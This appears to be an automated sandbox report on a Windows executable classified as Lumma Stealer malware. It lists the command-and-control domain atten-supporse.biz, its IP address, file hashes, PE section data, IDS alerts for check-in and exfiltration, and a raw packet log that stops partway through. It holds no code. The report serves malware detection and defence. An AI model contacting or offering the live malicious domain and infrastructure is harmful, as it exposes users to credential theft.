https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api66	file.exe, 00000000.00000003.2212521763.0000000001005000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212500277.0000000001002000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212421747.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz/apiq	file.exe, 00000000.00000003.2342586509.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337981805.000000000101D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2299804026.0000000001019000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300143521.0000000001019000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342950053.000000000101C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	file.exe, 00000000.00000003.2259012497.0000000001002000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344169345.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342603560.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300247730.0000000001000000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2299846192.0000000001004000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344351188.0000000001004000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235698406.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282437741.0000000001004000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261438179.0000000001003000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344299899.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344169345.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2237695245.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro8	file.exe, 00000000.00000003.2342603560.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	file.exe, 00000000.00000003.2238083604.0000000005932000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api)	file.exe, 00000000.00000003.2235655968.0000000001002000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235678317.0000000001005000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.112.1	atten-supporse.biz	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571976
Start date and time:	2024-12-09 23:24:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
17:25:08	API Interceptor	8x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	https://jet.cloudhostingworks.com/CetQr/	Get hash	malicious	HTMLPhisher	Browse
104.21.112.1	https://www.cursogratisroleta.com.br/apssessse	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
atten-supporse.biz	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	SJqOoILabX.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	https://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.139.78
	GLAMPITECT++LTD+(PROPOSAL).eml	Get hash	malicious	unknown	Browse	104.16.144.15
	https://xxx.cloudlawservices.com/fROBJ/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.79.7

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.112.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949059647879845
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'846'272 bytes
MD5:	1cfa4d3434f4056fd9d63f5c16c73c76
SHA1:	6c86f5fb5062e2037b6baf1701230bff249f89f7
SHA256:	49d35e116cb2a602f6f457f4003e0247c283b7e659f9f78022e102a25307acb1
SHA512:	2781e457d4353889a963282fb8e572ebea98cf78987ead57385fe6d54c22374c699dbd17c9f74080a838a7f3d8449740ab8698339a7e50a8c4f585ea81c07f0f
SSDEEP:	24576:WUNLDQqgRob7AR8c4nw22c3txXXpOyYpFtU1UdiftKae5tjr0vfUwJeozbQDOOOO:W+cqbe8c+3tdHAFtUPsaDfUY3Q6vNA
TLSH:	88853303AF00C454D2F8527066CA94464F34EA15A1E653AC33934CBD9EA793F27FA66B
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ug.............................0I...........@..........................`I...........@.................................\@..p..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x893000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6755B9EA [Sun Dec 8 15:23:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FA93CB58BAAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5405c	0x70	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x24200	d45ea47d0eee06ee20e19a33434675ed	False	0.9975197339965398	data	7.980056988548206	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x2b0	0x400	fe67bb2a9df3150b9c94de8bd81ed8a0	False	0.3603515625	data	5.186832724894366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	f89f2f28be6f3fc6a464feb82ace12f3	False	0.15625	data	1.1194718105633323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x55000	0x2a2000	0x200	ca4fb0e719fdff6d188b31753dadf0a5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bewqqxki	0x2f7000	0x19b000	0x19ac00	d0ff5f38bfc85360069871730bb58a92	False	0.99474094643944	data	7.953902804253043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
foqowxur	0x492000	0x1000	0x400	fe230a4b00453c9cb47d840e8a72324f	False	0.78515625	data	6.1078491296067865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x493000	0x3000	0x2200	ee2d439c4d19054ffaed0b7683ede1bd	False	0.08122702205882353	DOS executable (COM)	0.8416850663697654	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x53058	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T23:25:07.769238+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.6	55011	1.1.1.1	53	UDP
2024-12-09T23:25:09.232918+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	49707	104.21.112.1	443	TCP
2024-12-09T23:25:09.232918+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49707	104.21.112.1	443	TCP
2024-12-09T23:25:09.951463+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49707	104.21.112.1	443	TCP
2024-12-09T23:25:09.951463+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49707	104.21.112.1	443	TCP
2024-12-09T23:25:11.534432+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	49709	104.21.112.1	443	TCP
2024-12-09T23:25:11.534432+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49709	104.21.112.1	443	TCP
2024-12-09T23:25:12.257382+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49709	104.21.112.1	443	TCP
2024-12-09T23:25:12.257382+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49709	104.21.112.1	443	TCP
2024-12-09T23:25:13.726992+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	49710	104.21.112.1	443	TCP
2024-12-09T23:25:13.726992+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49710	104.21.112.1	443	TCP
2024-12-09T23:25:16.010614+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	49711	104.21.112.1	443	TCP
2024-12-09T23:25:16.010614+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49711	104.21.112.1	443	TCP
2024-12-09T23:25:18.470445+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-09T23:25:18.470445+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-09T23:25:20.850654+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	49719	104.21.112.1	443	TCP
2024-12-09T23:25:20.850654+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49719	104.21.112.1	443	TCP
2024-12-09T23:25:21.579589+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49719	104.21.112.1	443	TCP
2024-12-09T23:25:23.396773+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	49727	104.21.112.1	443	TCP
2024-12-09T23:25:23.396773+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49727	104.21.112.1	443	TCP
2024-12-09T23:25:27.664935+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	49744	104.21.112.1	443	TCP
2024-12-09T23:25:27.664935+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49744	104.21.112.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 23:25:07.993005037 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:07.993042946 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:07.993129969 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:07.996551037 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:07.996566057 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:09.232831955 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:09.232918024 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:09.236803055 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:09.236812115 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:09.237479925 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:09.289634943 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:09.289661884 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:09.289802074 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:09.951476097 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:09.951570034 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:09.951700926 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:09.975229025 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:09.975229025 CET	49707	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:09.975254059 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:09.975265026 CET	443	49707	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:10.315119982 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:10.315176964 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:10.315253019 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:10.315886021 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:10.315902948 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:11.534322023 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:11.534431934 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:11.535754919 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:11.535767078 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:11.536022902 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:11.540904045 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:11.540947914 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:11.541070938 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.257415056 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.257464886 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.257499933 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.257535934 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.257587910 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.257616043 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.257638931 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.257685900 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.257812023 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.268537998 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.268603086 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.268613100 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.276887894 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.276956081 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.276966095 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.320997953 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.376569033 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.430389881 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.430407047 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.452586889 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.452625990 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.452665091 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.452676058 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.452723026 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.452728033 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.452775955 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.452816010 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.452910900 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.452924967 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.452935934 CET	49709	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.452940941 CET	443	49709	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.513274908 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.513299942 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:12.513366938 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.513664007 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:12.513678074 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:13.726852894 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:13.726991892 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:13.728507996 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:13.728522062 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:13.728785992 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:13.730104923 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:13.730303049 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:13.730340004 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:14.663511038 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:14.663618088 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:14.663681030 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:14.663774967 CET	49710	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:14.663789988 CET	443	49710	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:14.797177076 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:14.797219992 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:14.797285080 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:14.797616959 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:14.797630072 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:16.010545015 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:16.010613918 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:16.012111902 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:16.012125969 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:16.012423992 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:16.013861895 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:16.014029980 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:16.014060974 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:16.014110088 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:16.014115095 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:16.978678942 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:16.978799105 CET	443	49711	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:16.978985071 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:16.978985071 CET	49711	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:17.257124901 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:17.257169962 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:17.257256985 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:17.257574081 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:17.257586002 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:18.470376015 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:18.470444918 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:18.487190008 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:18.487209082 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:18.487441063 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:18.488564968 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:18.488689899 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:18.488718033 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:18.488785028 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:18.488791943 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:19.314512968 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:19.314615011 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:19.314685106 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:19.315011024 CET	49713	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:19.315030098 CET	443	49713	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:19.637825012 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:19.637868881 CET	443	49719	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:19.637968063 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:19.638273001 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:19.638287067 CET	443	49719	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:20.850514889 CET	443	49719	104.21.112.1	192.168.2.6
